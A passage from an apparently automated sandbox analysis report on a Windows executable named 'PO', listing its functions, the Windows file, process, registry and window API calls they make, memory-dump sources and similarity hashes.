                                                Function 00405699 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 004056A9
                                                  • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                • CoUninitialize.COMBASE(00000404,00000000), ref: 004056F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: InitializeMessageSendUninitialize
                                                • String ID:
                                                • API String ID: 2896919175-0
                                                • Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                • Instruction ID: b888f1dcde8397bdf9a4ac710541df7d57aeeece4d3a8f29a6716c55d94af5f1
                                                • Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                • Instruction Fuzzy Hash: 0AF0B4776007409BE7115B54AE05B5B77B0EB90354F85483AEF8D726F1C7764C028B5D
                                                Function 00401F03 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
                                                • Instruction ID: cc057469d20fee5af05168c8280afa7b014ceb16d0f4b1b408cb009327ac905f
                                                • Opcode Fuzzy Hash: f524000984b40da921d67aceb392e6b1a27f4445b9fdd89c88039cce022366aa
                                                • Instruction Fuzzy Hash: 7BE04876908610DFE754EBA4AE495EE73B4EF80365B10097FE001F11D1D7B94D00975D
                                                Function 00405B24 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID:
                                                • API String ID: 3712363035-0
                                                • Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                • Instruction ID: 3e6b85693243cf5959e47e0a5ce0ecee53803ede082a99688cf67a66356fc275
                                                • Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                • Instruction Fuzzy Hash: 3AE0BFB4A10219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551D774A9148A7C
                                                Function 00401598 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                • Instruction ID: ad827bfb45cde9ed8aa1bf7c1acfcc20c377366860c5f8f00bfddef7402fec92
                                                • Opcode Fuzzy Hash: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                • Instruction Fuzzy Hash: 52E04F72B11114ABCB18CBA8EDD086E73B6AB54310350453FD502B36A4CA759C418B58
                                                Function 00406935 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                  • Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                  • Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
                                                  • Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                • Instruction ID: 5f896a6f513cb693e05c26686958cbb9026995673407ad46a654cc37c4de4e39
                                                • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                • Instruction Fuzzy Hash: BCE0CD73604310EBD61067755D0493773E89F85B50302483EF947F2140D734DC32A7AA
                                                Function 00406031 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                Function 0040600C Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,00405C11,?,?,00000000,00405DE7,?,?,?,?), ref: 00406011
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406025
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                • Instruction ID: fbd6844141adfc982ff7d741096df028d7bbee698e850df9006aa2ae5f51d9dd
                                                • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                • Instruction Fuzzy Hash: 24D0C972504221AFC2103728EE0889BBF55DB542717028A35F8A9A22B0CB304C668694
                                                Function 00405AEF Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                • Instruction ID: c3646108da72950d5b730f2af08982bf7448ccd78712563759f5c9f930c8cbe9
                                                • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                • Instruction Fuzzy Hash: 11C04C70244906DAD6509B219F0C71779A0EB50781F195839A586E50A0DA34B455D92D
                                                Function 004063DC Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                • Instruction ID: 15c5175e75f921513b7f3d75ccef30e451623c4c54541e9d5ee9eac1385433f3
                                                • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                • Instruction Fuzzy Hash: 1DE0E6B2010109BFEF195F50DD0AD7B371DEB04310F01492EFE16D4051E6B5E9306674
                                                Function 004060E3 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060F7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                • Instruction ID: b9d802e93a63440494d75fc60edee4ff4d41d1542efeb3ab79d4fb436c6ecda5
                                                • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                • Instruction Fuzzy Hash: 91E08C3220422AABEF109E909C04EEB3B6CEB003A0F014432FD26E6050D271E9319BA4
                                                Function 004060B4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,00000004,00000000,00000000,00000000), ref: 004060C8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                • Instruction ID: 0a9ed9335d9fcbf33a9b7557f86da276afb46ac39f2db62fb679b5cfb923300a
                                                • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                • Instruction Fuzzy Hash: C1E0BF32250269ABDF109E559C00AAB775CEB05251F014436B955E7150D671E92197A4
                                                Function 004015C8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2220587842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220624805.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2220935718.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2221154462.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 478cb40ad17b728b10cdbf16e79a2720acc2e44bc9a29048479925e3e1a41e6f
                                                • Instruction ID: f0c310d3f6fffa79c82dab7da22db7b00a6fee7441536bfeb36ed7c6a7bf75c0
                                                • Opcode Fuzzy Hash: 478cb40ad17b728b10cdbf16e79a2720acc2e44bc9a29048479925e3e1a41e6f
                                                • Instruction Fuzzy Hash: 94D05B72B08201DBDB00DBE89B48A9F77709B10368F30853BD111F11D4D6B9C945A71D
                                                Function 0040450C Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2220607284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
